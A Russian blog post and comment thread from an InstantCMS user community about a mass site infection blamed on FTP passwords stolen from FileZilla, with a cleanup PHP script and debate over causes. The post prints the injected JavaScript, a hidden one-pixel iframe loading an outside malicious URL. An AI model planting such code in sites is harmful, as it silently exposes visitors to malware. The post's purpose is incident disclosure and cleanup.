Увод паролей от FTP из-за собственной лени и неосторожности

Уважаемые друзья! К сожалению мне сейчас не до поздравлений. Да и настроение резко перестало быть праздничным. Все мои сайты, а так же знакомых сегодня быле жестоко заражены гадским трояном с адресом http:// nypmivhy.ru /count5.php НЕ советую по нему переходить. Сайты никак не взаимосвязанны, сторонних компонентов на некоторых вообще нет. Обидно, словами не пересказать.
Да и все на глазах происходило. Файлы изменялись в размере и в них прописывался код

<!--04b037--><script type="text/javascript" language="javascript">(function () {
var ipexz = document.createElement('iframe');
ipexz.src = 'http://nypmivhy.ru/count5.php';
ipexz.style.position = 'absolute';
ipexz.style.border = '0';    ipexz.style.height = '1px';
    ipexz.style.width = '1px';    ipexz.style.left = '1px';
    ipexz.style.top = '1px';    if (!document.getElementById('ipexz')) 
{        document.write('<div id=\'ipexz\'></div>');        document.getElementById('ipexz').appendChild(ipexz);    
}})();</script><!--/04b037-->

Поскольку коснулось не только моих сайтов, значит атака массовая. Не хочется истерить, но подозреваю что жертв на будет больше. Господа, давайте искать уязвимость, раз она уже нашла нас!

П.С.
После изучения логов и размышлений пришел к выводу что был банально стащен пароль к фтп с FileZilla, так как пользуюсь только єтой программой. Хотя к чужому сайту я пароля не имел, он тоже пользуется этой программой.

Вылечил сайт скриптом с заменой текста

 
 <?php
 
  function scan_dir($dirname) 
  { 
    // Объявляем переменные замены глобальными 
    GLOBAL $text, $retext; 
    // Открываем текущую директорию 
    $dir = opendir($dirname); 
    // Читаем в цикле директорию 
    while (($file = readdir($dir)) !== false) 
    { 
      // Если файл обрабатываем его содержимое 
      if($file != "." && $file != "..") 
      { 
        // Если имеем дело с файлом - производим в нём замену 
        if(is_file($dirname."/".$file)) 
        { 
          // Читаем содержимое файла 
          $content = file_get_contents($dirname."/".$file); 
          // Осуществляем замену 
          $content = str_replace($text, $retext, $content); 
          // Перезаписываем файл 
          file_put_contents($dirname."/".$file,$content); 
        } 
        // Если перед нами директория, вызываем рекурсивно 
        // функцию scan_dir 
        if(is_dir($dirname."/".$file)) 
        { 
          echo $dirname."/".$file."
"; 
          scan_dir($dirname."/".$file); 
        } 
      } 
    } 
    // Закрываем директорию 
    closedir($dir); 
  }
 
  $text = "(function () {    var gqiam = document.createElement('iframe');    gqiam.src = 'http://nypmivhy.ru/count5.php';    gqiam.style.position = 'absolute';    gqiam.style.border = '0';    gqiam.style.height = '1px';    gqiam.style.width = '1px';    gqiam.style.left = '1px';    gqiam.style.top = '1px';    if (!document.getElementById('gqiam')) {        document.write('<div id=\'gqiam\'></div>');        document.getElementById('gqiam').appendChild(gqiam);    }})();"; // Искомая строка
 
 $retext = ' '; // Строка замены
  $dirname = "."; 
  scan_dir($dirname);  // Вызов рекурсивной функции 
 
?>

Это для скриптов, для всех прочих файлов немного изменил значение $text — просто скопровал с зараженного файла шаблона

$text = "<!--04b037--><script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var ipexz = document.createElement('iframe');    ipexz.src = 'http://nypmivhy.ru/count5.php';    ipexz.style.position = 'absolute';    ipexz.style.border = '0';    ipexz.style.height = '1px';    ipexz.style.width = '1px';    ipexz.style.left = '1px';    ipexz.style.top = '1px';    if (!document.getElementById('ipexz')) {        document.write('<div id=\'ipexz\'></div>');        document.getElementById('ipexz').appendChild(ipexz);    }})();</script><!--/04b037-->";

Хочу так же объяснить, сайт templateinstant.ru/ и демо-поддомены не содержат вирусов. Сайты чисты, но после взлома занесены в блек-лист Яндекса и Гугля. После перепроверки этими сервисами они будут разблокированы. К сожалению на это требуется пару дней. Сайт можно проверить например этим сервисом — sitecheck.sucuri.net

Увеличение/уменьшение шрифта в статьях и блогах

Компонент "Конкурсы" для 1.9 и 1.10 - Новая версия

185 комментариев

Реклама #

Игорь Филиппов 12 лет назад #

У Вас и ваших знакомы, хостинг разный?

deltas 12 лет назад #

да, совсем разный...

Suslik 12 лет назад #

боюсь предположить что не только пароли от фтп воруются но и домены и не инстантом а виндовс вирусом - вот у знакомой украли домен и сайт на друпале, украли через взлом почты, мне интересно - у кого еще что-то взломали - но того который не пользуется виндовс и ни разу не вводил пароли от фтп в виндовсах!
http://seosmm.net/blogs/seo/molitvoslov.html
взломали в тоже самое время что и у вас, очень интересное совпадение - то есть возможно виндовс вирус

Александр 12 лет назад #

Сейчас решил зайти на сайт http://templateinstant.ru/shop , так сразу хром начал ругаться

Николай (asd43) 12 лет назад #

То же самое пока не отключил ативирус не пускал.

-3

Алексей Т 12 лет назад #

Закрыл сайт до выяснения обстоятельств

fact 12 лет назад #

1.9 или 1.10 двиг?

letsgo 12 лет назад #

На форуме бы это обсуждать, но кто то смодерировал удачно, удалил тему. Фиг с ним, значит тут. У меня сайты пока целы, но у знакомого 4 сайта накрылись также. Версия сайтов 1.9 и 1.10. У кого то есть заражение версией 1.10.1?

Николай (asd43) 12 лет назад #

У меня, но уже снес

Cruzka 12 лет назад #

На форуме тема была, что у одного паренька тоже сайт таким образом ломанули, вставив бяку. Тема удалилась куда-то..

Сайты на инстанте? Версия 10 или 10.1?

fact 12 лет назад #

так как у многих 1.9 и есть заражённые значит актуально , ищём решения

deltas 12 лет назад #

2 моих сайта на 1.9 один на 1.10 без последнего патча. сайту пару дней. это не считая поддоменов...

Cruzka 12 лет назад #

где зараза появляется? в файлах шаблона?

letsgo 12 лет назад #

индекс php в корне и в админ, в админ, также файл логин php Там прописаны коды.

fact 12 лет назад #

а .htaccess - они как?

deltas 12 лет назад #

тоже с заразой внутри

Андрей Кравченко 12 лет назад #

У меня три сайта тоже выдают такие же окна!

fact 12 лет назад #

капец, сволочи и пер новым годом активизировались, совсем совести нет

letsgo 12 лет назад #

Зашел в аккаунт Беларуса)

fact 12 лет назад #

приехали

Cruzka 12 лет назад #

спалите хоть в личку ссылку

Александр 12 лет назад #

у меня всё норм, хром не ругается

deltas 12 лет назад #

я пользуюсь FileZilla для доступа по FTP, знакомый тоже... вот и причины скорее всего... может и ложная тревога.

Cruzka 12 лет назад #

Клиент с одного дистриба качали, али пароли одинаковые?

-1

letsgo 12 лет назад #

Та ясно, что Леша тоже всего лишь пострадал, я просто к тому скрин сделал, что вопрос серьезный однако.

Def 12 лет назад #

вот и у меня такое было с одним сайтом правда на другом движке. тодже файлзиллу юзаю. вот и думаю мож отказаться от него

Коля 12 лет назад #

Судя по видео выложенному на сайте templateinstant.ru Белариус не пользовался FileZilla а каким то командером.
У кого нибудь кто не является разработчиком дополнений для инстант еще взломали сайт ?

Cruzka 12 лет назад #

Предположу, что, раз по словам Fuze

Fuze:

Уязвимости были найдены, в том числе одна серьезная, однако для ее эксплуатации нужны хорошие знания sql, поэтому большого повода для паники нет

кто-то таки накатал сценарий для потокового "обновления" файлов на сайтах с инстантами.
что-то типа
foreach ($sites in $site_list){
//применяем однотипную атаку, заражая одни и те же файлы
}

Заражённые, вы сайты светили где-нибудь, в связанном с инстантом? Каталоги ресурсов на инстант, подписи на форуме?

deltas 12 лет назад #

я так же подумал с самого начала... хотя сейчас засомневался. Но то что вы говорите нас тоже наверное всех ждет

r2 12 лет назад #

Та уязвимость не приводила к доступу на запись в файлы
да и таким перебором ее вряд ли можно было эксплуатировать

deltas 12 лет назад #

хорошо хоть нашел способ быстрого излечения от заразы :
1. почистить все компы с доступом к сайту.
2. сменить пассы на фтп, админку

Есть такая бесплатная прога MassTextProcessor (MTP). Ею можно поменять один и тот же текст сразу во всех файлах.
Скачиваете свой сайт на комп, запускаете МТР, указываете каталог с файлами сайта.
В обработке указываете код вашего трояна в качестве исходного текста, заменить на то что в кавычка TEXT="", т.е. удалить. Запускаете и прога сама выкинет везде вредоносный код.
Теперь можно заливать файлы обратно на хост.

fact 12 лет назад #

уверены что повтора не будет?
тут врят ли так просто можно надолго избавиться от заразы, как то много заражённых резко появилось за сутки

letsgo 12 лет назад #

Я писал такой же рецепт, с использованием notepad +++ в теме на форуме. Там есть функция заменить в коде массовая. Повторю. Скачиваем сайт на комп, открываем любой файл нотепадом, делаем поиск по слову в папке. Далее делаем массовую замену кода на пустой знак и все. Первое надо для того, чтобы не пропустить другой вид кода. Вставить в поиск лучше словом название того сайта, который явился источником заразы.

deltas 12 лет назад #

Во всех скриптах эта зараза умная в конце файла... в остальных в произвольных местах

deltas 12 лет назад #

Написал выше код, с помощью него за 3 секунды вылечил сайт

st.Puh 12 лет назад #

deltas:

Написал выше код, с помощью него за 3 секунды вылечил сайт

А как им лечи то? Пошагово опишите пожалуйста.

deltas 12 лет назад #

Сохранил код в файл 1.php затем запустил его в браузере сайт/1.php
потом сменил значение $text на другое, сохранил и опять зашел. Скрипт проходится по всем файлам и удаляет вредоносный код. Конечно код может быть у всех разный, так что лучше скопировать из зараженного файла.
Код заражения разный в файлах .htaccess , js-скриптах и во всех других файлах.

fact 12 лет назад #

так .htaccess смотрели- они как?

deltas 12 лет назад #

так же как и все файлы заражены

Cruzka 12 лет назад #

Меня сейчас очень интересует вопрос, что там с версией 1.10.1? прецеденты были?

Николай (asd43) 12 лет назад #

написал уже выше тоже ломанули, без разницы какая версия

Dim@sik 12 лет назад #

а как проверить заражён сайт или нет ?

deltas 12 лет назад #

Итак, скорее всего банальное воровство пароля с фтп-менеджера. Повода для паники нет скорее всего. Пост бы удалил, да вот код для замены текста наверное пригодится кому-то.

AndroS 12 лет назад #

Мне вот очень интересно знать, пострадали ли сайты на 1.10.1? И неужели нет никакой защиты от подобных атак?

stavpit 12 лет назад #

У меня нет но кому он нужен

Evgenii 12 лет назад #

Та же самая ситуация, все сайты на Инстант 1.10 взломаны и прописаны коды, на все ругается касперский и браузер хром.
прописывался код в .htaccess и template пока больше не нашол, самое интересное - код убираю, меняю все пароли а через час все опять на месте...

universe 12 лет назад #

было у меня что то подобное пол года назад где то. Лежал файл в одном из папок если прописать до него путь, то сайт заражался удаляешь весь код, через пять мин заново. Может у кого то лежит этот файл где нибуль вот и сапускают и сайт заражается. А пароли тоже с файллизза стырыли, пришлось менять все пароли и от почты тоже.

stavpit 12 лет назад #

посмотрел сайты некоторые на инстанте чужие работают но есть одно но они долго не обновляли и не добавляли контент. значит по ФТП не заходили.

Ramin 12 лет назад #

На своих сайтах не наблюдаю подобного, сайты обновил вчера до версии 1.10.1

RIM5 12 лет назад #

Проверьте, у кого данная проблема возникла, ставили ли Вы на свои сайты модуль (недавно выставляли тут) с падающими снежинками, открытками, детсвим радио и т.д., который базируется на сайте "101виджет".
Данная проблема наблюдалась при установке данного модуля.

-1

letsgo 12 лет назад #

Да на сайтах знакомого которые поймали троян был модуль снежинок. Я себе не ставил, и не поймал ничего.

Майкл 12 лет назад #

Этот?
http://instantcms.ru/blogs/moe-hobi/novogodnie-snezhinki.html

-1

letsgo 12 лет назад #

видимо да.

Evgenii 12 лет назад #

я заметил что у меня после гирлянд началось такое, кстати модуль гирлянды из блогов убрали..

Май 12 лет назад #

У меня стоит этот модуль со снежинками, сайт нормально работает, вредоносного кода не обнаруживается. И автор модуля человек с очень хорошей репутацией, многим помогает в сообществе, такого просто не может быть чтобы он троян стал распространять. Если только не умышленно, но тоже наврядли, так как грамотный специалист.

-1

RIM5 12 лет назад #

Я и не говорю, что виноват конкретный разработчик))
Я говорю, что данная проблема возникает у людей, использующих виджеты с сайта "101виджет". А данный модуль именно это и использует.
Май, какой у Вас антивирус? Киньте ссылку на страницу, где данный модуль стоит.
Сколько сайтов пересмотрел, везде где эти виджеты, везде антивирусник матерится.

Май 12 лет назад #

Ссылку не кину, извините. У меня Nod32, проверял также через гугл вебмастер-панель.

nedoriko 12 лет назад #

у меня тренд дома. модуль я себе тоже поставил. вот если интересно ссыла где модуль установлен http://region33.name
а вот результаты онлайн проверки
доктор вебом
как видите проблем нет

Димитриус 12 лет назад #

Честно говоря сомневаюсь, что это мог быть он

Николай (asd43) 12 лет назад #

такого модуля не было но поймал троян 1.10.1

RIM5 12 лет назад #

Значит проблема не в модуле, а как написал ТС в уводе паролей от ФТП.

Ше 12 лет назад #

Автор, напиши подробности что ли... а то не какой конкретики, просто новогодняя сказка получается, у всех внезапно ломанули и паника паника...
Какая версия, какой хостинг, какие модули и плагины добавлял?

Майкл 12 лет назад #

На сказку это не похоже.
Разбираются люди, вот уже и подозреваемый модуль появился.

-1

Anonim 12 лет назад #

winSCP таки рулит?

picaboo 12 лет назад #

Тут главное сохранить трезвость мысли и не паниковать. Либо утекли пароли от фтп, либо заражение. Проверить легко, надо найти что менялось и каким образом. Если не жалко, дайте в личку серверные логи за тот день когда была прописана бяка и желательно фтп доступ, ну или надо будет несколько скринов показать

Патчи ставить надо обязательно и сразу, поскольку по внесенным изменениям в дистриб, можно увидеть где было слабое место.

Димитриус 12 лет назад #

Согласен.
Еще интересно, когда по времени и дате это произошло.

Николай (asd43) 12 лет назад #

в 11 часов утра вчера применил последний патч а вечером примерно в 18 00 зашел и обнаружил

IRATE 12 лет назад #

Для информации. Где-то полгода назад у меня было заражение сайта - при входе на главную страницу открывался еще один сайт - с продажей диванов, причем шел редирект с другого сайта (dorm.net, если не изменяет память). Ссылка шла единоразово, то есть второй раз не открывалась. Поэтому одним из первых перешел на 1.10. Сейчас такого нет. Да, поставил еще один сайт типа буфера (платная услуга хостинга). Ранее, на 1.9 периодически появлялись левые файлы, которые выявлял Ай-болитом. Сейчас вроде ничего не видит.

Pasha 12 лет назад #

Я говорю, что данная проблема возникает у людей, использующих виджеты с сайта "101виджет". А данный модуль именно это и использует.

1. Модуль (скрипт) не имеет никакого отношения к сайту 101widgets.com
2. Перед выкладыванием в массы скрипт был вычитан от первой до последней строки. Ничего левого в нем нет, чистая математика.
3. Ищите истинную причину.

AlexandrA 12 лет назад #

Подтверждаю, три действующих сайта на 1.10 (без патча пока еще) ни какого заражения и при этом на всех трех модуль снежинок работает. Правда FileZilla для доступа по FTP не пользуюсь, только по старинке использую тотал коммандер.

Димаха 12 лет назад #

Trang 12 лет назад #

у меня тоже и гирлянды, и снежинки работали и работают. Всё чисто. FileZilla также пользую. Пока всё тип-топ

st.Puh 12 лет назад #

Хотелось бы услышать мнения уважаемой администрации сайта Fuze и r2. Что они скажут об инфицировании их движка

Fuze 12 лет назад #

Не нужно перекладывать на нас ответственность.

Все просто: есть последняя стабильная версия 1.10.1. Если есть подозрение, что взлом прошел через саму CMS, а так же если все рекомендации по безопасности выполнены (банально права на файлы выставлены верно), то

Fuze:

После исправлений взломов быть не должно, но если вдруг будут взломы, похожие на взломы через саму InstantCMS, исполнитель готов браться лично за рассмотрение и устранение.

Исполнитель аудита.

По данной теме мое личное мнение:
если в системные файлы движка был записан вредоносный код, то
- права на файлы и директории небезопасные;
- утащили доступы на хостинг;
- версия системы менее 1.10.1.

letsgo 12 лет назад #

сделай уже наконец кнопку проверки прав на папки то. Пишем о безопасности а простые вещи из за которых 90% взломов происходит никак не осилим. Знаю, что и так многое сделал, но это тоже хотелось бы, реально нужная вещь для защиты сайта.

Взлом думаю произошел из за сайта 101виджет. Поменьше ставьте чужих скриптов и все будет хорошо. Думаю вины системы в этом нет.

deltas 12 лет назад #

101виджет у меня небыл установлен

Fuze 12 лет назад #

сделай уже наконец кнопку проверки прав на папки то.

может не нужно на меня все взваливать? тут куча разработчиков, обращайтесь к ним.

но это тоже хотелось бы, реально нужная вещь для защиты сайта.

реально нужная вещь это голова. я тебе лично в аське говорил свою позицию о данном вопросе. повторюсь: в системе этого не будет по тем же соображениям безопасности. зашел злоумышленник в админку - и тут тебе вуаля - список директорий и файлов доступных для записи, дальше логическую цепочку продолжите? пользователи ЛЕНИВЫЕ и пофигисты пока петух простите не клюнет, не пошевелятся.

p.s. deltas, к вам в огород камни не кидал smile

просто в целом написал.

-1

letsgo 12 лет назад #

Да все понимаю, но гораздо легче поставить сложный пароль к админке, чем проверять файлы и папки на правильность прав. Куча сайтов Инстант работает без правильно настроенных прав. А вообще, конечно ты и так многое сделал, кто готов такое сделать, готов отблагодарить.

Fuze 12 лет назад #

да и кстати, любителям нуллов и вареза:
я тут недавно зашел на один варезный сайт instantcms и сам чуть было не "попал", благо имею привычку отключать все плагины и т.п. в браузере перед заходом...
я конечно все понимаю, что перед тем как сообщать о взломе ни кто не признается в том, что ищет и использует нуллы, но знайте, что:
- авторы нуллов не робин гуды;
- их главная задача - заработать любыми способами.

выводы делайте сами.

p.s. это я для общей информации не конкретно кому-то.

deltas 12 лет назад #

тоже недавно писал об этом

deltas 12 лет назад #

Не успел ответить первым smile

Я тоже так считаю, создатели делают все возможное, но мы же сами должны предостерегаться. Я признаю что виновен во всем сам - пароли к ФТП не менял ни разу, считал что мелкие сайты никому не нужны для взлома, да и занят всегда чтобы проверить систему. А надо было!

lezginka.ru 12 лет назад #

у меня, как не странно, все нормально
у FileZilla есть одна фигня, при всей хвалебности - сохраняет пароли без спроса :(
у тотал такого нет. делаем выводы :)

googlebot 12 лет назад #

Народ, написано же "пришел к выводу что был банально стащен пароль к фтп с FileZilla", просто не сохраняйте пароли ни в каких фтп клиентах, если уж с памятью совсем беда, есть проверенный keepass...

Марат 12 лет назад #

Два сайта - 1.10 и 1.9(пока) - тьфу, тьфу, взломов вроде нет. Первый светил где только можно и даже, наверно где нельзя.
На хосте сайты раскиданы по разным пользователям unix, права стоят нужные. По фтп захожу только сам, через Тотал Коммандер. Пароли не сохранены, каждый раз вбиваю по новой. На локальном компе стоит лицензионный Касперский.
Причина взломов, думаю, всё же в фтп клиентах.
А кто-то хотел ещё для root-а фтп доступ установить.

garry 12 лет назад #

Смотрел сейчас один из "массово" зараженных сайтов. Оказалось что "массово" заражены и сайты соседей по серваку.
Отсюда вывод, новогодние праздники у админов хостинга будут не веселые. И инстант тут не причем.

garry 12 лет назад #

Добавлю, что конечно работа с фтп должна быть ответственной и клиенты и компы чистые. Но в том случаи не клиент от фтп.

deltas 12 лет назад #

Да, тоже сейчас посмотрел сайт с моего хостера - на DLE, тоже с заразой... только бы понять от меня к ним или от них ко мне прилезло...

Коля 12 лет назад #

deltas:

Последняя рассылка на дле:

дле:

Ошибка в версии: 9.7 и все более ранние версии Степень опасности: Высокая при использовании включенной настройки register_globals, отсутствует при выполнении рекомендаций по отключению данной настройки в настройках сервера. Установка патча тем не менее обязательна для всех, т.к. патч устраняет возможный обход каптчи и другие проблемы.

st.Puh 12 лет назад #

Вывод один обновляться до 1.10.1, поменьше тыкать что попало к себе на сайт,перепроверит все права на папки.И постоянно следить за обновления безопасности движка и при появлении обновления сразу обновлять.Лично я в первый же день выхода патча безопасности обновился.

Saw 12 лет назад #

Коротко и ясно. Абсолютно согласен. И лень матушка нам сильно вредит (по себе знаю!)

deltas 12 лет назад #

Вредный сайт на хостинге у www.reggi.ru , а они уже наверное в новогоднем запое - на связь не выходят...

Коля 12 лет назад #

Дата регистрации: 07.12.2012, а разве для регистрации в зоне ру не нужен паспорт ?

BlondinkO 12 лет назад #

Паспортные данные надо вводить, но скан паспорта уже не просят. А уж указать можно что угодно.

Николай (asd43) 12 лет назад #

у меня тоже ломанули на 1.10 сайт свежий был две недели и копии не было, только патч последний поставил и вечером ломанули, пришлось все сносить.

ALreD 12 лет назад #

Простите, не стал читать все комменты - тороплюсь немного... Потому, может и повтор - но вдруг кто прочтет и подумает...

Да, есть такая проблема! Но дело не в FileZilla а в сохранении паролей в виндосе... Подчеркиваю, проблема в Винде! Сам так потерял 2 сайта в прошлом году на Битриксе... Так как много лет живу уже на МАС OS, немного ослабился контроль и рефлексы. ПРишлось неделю админить сайты на винде (чужой ноут...) и вот что приключилось! С тех пор кроме как из моей любимой MAC в админки и на ФТП не хожу... И всем советую))) Всех с праздником, сочуствую пострадавшим...

IRATE 12 лет назад #

Не надо гнать на винду! Если стоит лицензия, то никакой проблемы с безопасностью у админской машины нет. Не слышал, чтобы хостинги с серверами на винде кто-то ломанул. Но такие хостинги дороги, зараза. Вы, прежде чем писать поинтересовались бы безопасностью вообще, тем более - это ваша работа.

IRATE 12 лет назад #

Добавлю. Назовите операционную систему на которой создан самый большой ботнет 2012 года.

-1

ALreD 12 лет назад #

Добавлю... Лучше посчитайте вирусы, которые написаны на МАС... Да Бог Вашего знания устного счета для этого хватит.

-1

ALreD 12 лет назад #

Не Вам судить о моей работе. А лучше прочтите что написано тут и не только мной. Причем тут сервер? Речь о клиентских компьютерах, на которых сохранялись пароли и которые были похищены вирусными программами... Желаю Вам дальнейшей любви к Виндосу а еще больше, что он Вас "полюбил"... Может тогда думать начнете...

IRATE 12 лет назад #

В общем человек, который хотя бы раз был на конференциях по безопасности поймет кто прав. Смысла не вижу что-то вам разжевывать.

Нил™ 12 лет назад #

Проверил сайты Гугл Хром, Nod 32, Doctor Web... вроде чисто. Снежинки и т.п не ставил, пользуюсь Filezilla. По поводу того что он сам сохраняет пароли (Для Lezginka) не замечал, у меня не сохраняет, правда в последней версии программы стал предлагать сохранить его, но все же автоматом не сохраняет. Тотал Командер насколько знаю как раз таки сохраняет по умолчанию при создании соединения.
За сигнал спасибо. Желаю всем поскорей избавиться от заразы...

-3

Александр 12 лет назад #

Скрипт не работает, описан к применению плохо. Администрация движка могла бы и заняться проблемой и нормально написать, в чем причина и что главное как и в каких фаилах удалять дрянь. Одним словом что-то совсем расслабились, как никак массовый взлом тем более перед праздником.

picaboo 12 лет назад #

массовый - это у меня и того парня, который пароли хранил в файловом менеджере? или полторы тыщи сайтов на инстанте копыта вверх откинули?

Dost 12 лет назад #

Отож. Тему можно было бы более обдумано называть.

Александр 12 лет назад #

Хватит минусовать, тоже мне, как что то напишешь об админах так сразу минусы - сразу видно что тут сплошные жополи..ы. Я написал что администрация должна была нормально реагировать на такие проблемы и это правильно. На всех двигах так и есть.

r2 12 лет назад #

Я не понял, в чем собственно претензия?
Троян увел у человека сохраненные пароли (которые, к слову, никогда нельзя сохранять).
И как же, по-вашему, эта ужасная администрация должна реагировать?

Александр 12 лет назад #

Если Массовый взлом, а он массовый учитывая что это произошло и у человека который это написал и некоторых комментаторов и меня и еще несколько человек, которых я знаю лично и у всех сейчас сайты встали. Где определенная инструкция как лечить? То что написано в этой теме вообще не понятно как применять, более того применив ситуация остается такой же т.е. все фаилы заражены. Инструкция без описания, нормального языка и.т.д. недаром за такое лечение половины людей минусонуло теме

Ну со мной то ладно я знаю как лечить и сейчас это уже делаю, но многим другим вообще не будет ясно что делать. Как минимум админы должны были НОРМАЛЬНО для разного уровня пользователей написать по пунктам что и как делать, как чистить и.т.д. КАК ЗАПУСКАТЬ СКРПИТ и вообще работает ли он.

И что Вы всегда так болезненно реагируете на то что кто то Вас не хвалит, учитесь выслушивать и тех кто не льет варенье в уши.

Александр 12 лет назад #

Да кстати как я заметил что траян действует не одновременно, сейчас списался со знакомыми у кого то упал вчера, у кого то сегодня утром. У меня примерно час назад. Как только пойму как действенно лечить сразу выложу. Пока самое просто только бэкапом, а сегодня люди как раз больше всего общаються, пишут и.т.д. ((-

r2 12 лет назад #

Действенно лечить - это менять все пароли и никогда НИГДЕ их не сохранять.
Затем пройтись автозаменой - см. инструкцию в комментарии ниже.

omarov 12 лет назад #

Где изменить пароль основного админа?

r2 12 лет назад #

Ну и напоследок вот доказательство того, что данная атака не имеет отношения к InstantCMS:
http://stackoverflow.com/questions/14097982/javascript-code-added-to-server-page-automatically

r2 12 лет назад #

Простите, но вы пытаетесь мне объяснить что ошибки пользователей - это моя вина.
Народ ловит трояны, а виноваты злые админы, так получается? Не смешите, пожалуйста.
Когда есть уязвимости в движке всегда выходят патчи без всяких вопросов, все об этом знают.

Вы хотели бы услышать подробную инструкцию как удалить одинаковый текст из нескольких файлов?
Без обид, но это же операция уровня "начальный пользователь ПК".
Окей, вот инструкция:
1. Берем любую программу, поддерживающую поиск по нескольким файлам
2. В поле "Найти" вносим вражеский код, в поле "Заменить на" - пустую строку
3. Производим замену.

И да, я болезненно реагирую на необоснованные претензии вроде вашей.

Александр Корн 12 лет назад #

C новым годом! Извините, но пишите бред! Здесь уже неоднократно писалось (в том числе и пострадавшими), что вредоносный код появляется по вине владельцев сайтов! Соответственно на разработчиках движка нет никакой ответственности!
Теперь по поводу описания лечения от разработчиков... Если они будут писать способы лечения от всех зараз, которые могут подцепить неопытные и невнимательные пользователи, то им (разработчикам) придется забросить дальнейшее развитие системы!
Вы неправы ИМХО

-7

Игорь Филиппов 12 лет назад #

Как бы увели, не у 1 человека, а у десятка. Администрация должна рассказывать что и как

r2 12 лет назад #

Все уже рассказано в посте, автор описал подробнее некуда.

Игорь Филиппов 12 лет назад #

Согласен

BlondinkO 12 лет назад #

Более 20-ти сайтов, из них примерно половина на инстанте, 1.9, 1.10, пока чисто... Надеюсь, так и останется. Спасибо за сигнал, мониторим...

IRATE 12 лет назад #

Не зря доступ к серваку через ftp по сертификату есть...

Владимир 12 лет назад #

instantcms 1.9 на ftp можно заходить только с моего IP. Перед каждой сессией лезу в админку (вход в админку только после подтверждения по CMC) и выставляю свой IP. Пользуюсь FileZilla на МАКе. Все пароли на админку и ftp храняться в браузере и FileZilla. Пока тьфу-тьфу.

Игорь Филиппов 12 лет назад #

У вас ftp пароли только от instantcms украли?

AlLar 12 лет назад #

deltas! - не отчаиваться!
Всех с Наступающим!
Вопрос: а templateinstant.ru не иза этого закрылся?, а то зделал заказ на новый год, а там дела...
Апокалипсис пережили - и это всё переживём!
Всем удачи, любви и счастья!!!

Денис Васильевич 12 лет назад #

а что файрволом.. антивирусом.. уже некто не пользуется ?

IRATE 12 лет назад #

Я, думаю, если бы были соблюдены элементарные нормы, такие как не пользоваться крякнутым варезом, то проблемы бы такой не было.

IRATE 12 лет назад #

Например, не думаю, что кто-нибудь покупал описанный здесь тотал командер.

Денис Васильевич 12 лет назад #

я разумею так..

ежели на клиентском пк стоит антивирус и файрвол то варез тут не причем.
сначала заражается клиентский пк а после файлы редактируемые через эту систему.
что же до прямого заражения на сервере то тут нужно соблюдать права на запись.
троян не действует в избирательном порядке, не выбирает скрипт для заражения.

IRATE 12 лет назад #

Антивирус не закрывает дыру в коде вареза - это дело производителя вареза, а так как он крякнутый, то - привет. Файер вообще для других целей стоит.

IRATE 12 лет назад #

То есть в данном случае пассы увели через дыру в клиенте, а уже потом запускали скрипт на сайте.

garry 12 лет назад #

Народ вы в первый раз в сети или сайты у вас первый год?
Никогда не слышали о активизации всевозможной гадости перед НГ, дабы траф украденный более продуктивно использовать.
Да за эти несколько дней "сломано" десятки тысяч сайтов. Причем на многих шеллы залиты не вчера и просто ждали своего часа. таким образом открыто море хостингов и сайтов.

Аааааааааа караул блин, пипец все пропало!!!!!!!!!!
Архивы залили права поменяли, пароли свежие и все, "взлома" нет.
Или вам базы потерли и сайты посносили, на серваках потерли бекапы и сожгли процы?
Ну не бывает такого что бы не было внимания к набирающим и популярным системам. Причем в данном случаи, то что я смотрел вина, если так можно сказать, хостеров в одном случаи и вина админа в другом(троян).

И на будущие, смотрите логи постоянно как только сайт становится боле менее популярным и будите удивлены сколько сотен раз в день вас пытаются отыметь, иньекции причем самый безобидный способ.

Но в любом случаи админов икмс срочно наказать, желательно подать жалобу в Гаагский трибунал!!!
Но лучше у кого есть знакомство в консульстве Китая, поговорите что бы им дали быстренько гражданство и тогда можно будет и к расстрелу подвести. Как минимум пожизненное!

С Новым Годом, берегите нервы, все будет проще, Со свежим бекапом Вас!!!

+10

Fuze 12 лет назад #

Еще раз для подстрекателей типа "админы instantcms не помогают и не принимают мер":

R2:

Ну и напоследок вот доказательство того, что данная атака не имеет отношения к InstantCMS: http://stackoverflow.com/questions/14097982/javascript-code-added-to-server-page-automatically

Спокойней, господа. Уже всем ясно, что InstantCMS здесь не при чем. Любой версии, даже 1.0 ))

И в очередной раз, я надеюсь, все убедились, что безопасности много быть не может и самое главное - безопасность ВАШЕГО сервера зависит от только от ВАС.

С наступающим Новым Годом!

Игорь Филиппов 12 лет назад #

Вот!)) спасибо, и вас с наступающим)

Cruzka 12 лет назад #

Здравствуйте.
С наступающим!

Майкл 12 лет назад #

И Это дарует, что безопасность InstantCMS вне была преодолена.
Для себя сделал вывод, что паника страшная штука.
Давайте в дальнейшем к подобным вещам относится с холодным сердцем и трезвым умом.
Всех поздравляю с наступающим новым годом! Остались считанные часы. )))

nikolas 12 лет назад #

добавлю пару строк...

Уходит Старый Год
Шуршит его последняя страница

Пусть лучшее.что было-не уйдёт,
А худшее-не сможет повториться!
Пусть щедрым будет Новый год!
Пусть он на счастье не скупится,

Пусть зажигает звёзды в срок

ЧТОБ ВСЕМ ЖЕЛАНИЯМ СБЫТЬСЯ!

p.s. Берегите нервы.... InstantCMS тут не причем....ик ))))

Azura 12 лет назад #

Помню у меня был подобный "взлом".) Разобрались быстро. smile

Наказали неосторожных)))

RSN 12 лет назад #

В FileZilla. Разорвать соединение, Зайти в менеджер сайтов, удалить пароль от соединения, и после этого обязательно проделать следующее. Войти во вкладку "Расширения"-->Удалить личные данные, нажать "ОК"

И так всегда, что бы это было уже на рефлекторном...
Пароли только на время соединений. Остальное время на флешке. Вставил флешку скопировал пароль, подключился, работу закончил... дальше как писал выше.

Cruzka 12 лет назад #

когда массово воровали вебмани, отдельные люди предлагали покупать нетбук чисто для вебманей =)

SEOrigin 12 лет назад #

А я так и сделал, правда не следуя чьему-либо совету, а сам понял необходимость. Купил маленький acer ferrari one, и с тех пор сплю спокойно. Кроме кипера на компе нет ничего. Браузер - portable на флешке. Keepass также на флешке.

oll 12 лет назад #

Свежая подляна.В поиске не светиться. Это данные домена
по http://nic.ru/whois/?query=nypmivhy.ru

Код PHP:

 
по данным WHOIS.TCINET.RU:
 % By submitting a query to RIPN's Whois Service
 % you agree to abide by the following terms of use:
 % http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
 % http://www.ripn.net/about/en/servpol.html#3.2 (in English).
 
 domain:        NYPMIVHY.RU
 nserver:       ns1.newrect.com.
